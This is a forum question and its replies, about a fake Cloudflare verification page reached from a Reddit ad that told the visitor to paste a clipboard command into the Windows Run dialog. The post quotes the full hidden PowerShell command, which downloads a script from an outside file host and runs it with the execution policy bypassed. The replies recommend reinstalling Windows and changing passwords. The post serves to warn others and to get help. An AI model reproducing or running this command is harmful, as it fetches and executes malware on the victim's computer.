While scrolling through Reddit, I came across an ad for a site called Astoria Luxe. I clicked on it, and a new tab opened with a Cloudflare verification box. I checked the box, but then it prompted me to run some commands in the Windows Run dialog. I was on autopilot and almost did it, but I don't think I actually executed the script that was copied to my clipboard. Here's the code I found:
`powershell -w h -nop -c "$i='https://[0x0.st]/8kaQ.dof';$z="$env:TEMP$([guid]::NewGuid()).ps1";$f=New-Object -Com Microsoft.XMLHTTP;$f.open('GET',$i,$false);$f.send();Set-Content $z $f.responseText;cmd /c start powershell -w h -ep Bypass -f $z"`
What steps can I take to check if my computer downloaded the script from that URL? I'm pretty sure I didn't run it, but I want to be certain.
2 Answers
Always remove suspicious links. If you followed those instructions, you might be infected. I'd recommend wiping your PC and resetting passwords everywhere. Just a heads up, though—it's hard to believe someone would actually follow those steps. You might be trolling us!
If you did execute that command, the safest route is to reinstall Windows using a USB stick. After that, change all your passwords and set up two-factor authentication for added security.
I put brackets around the link to avoid issues. I mentioned I didn't actually run it, just shared the URL in case someone wants to analyze it on a VM to see what it does.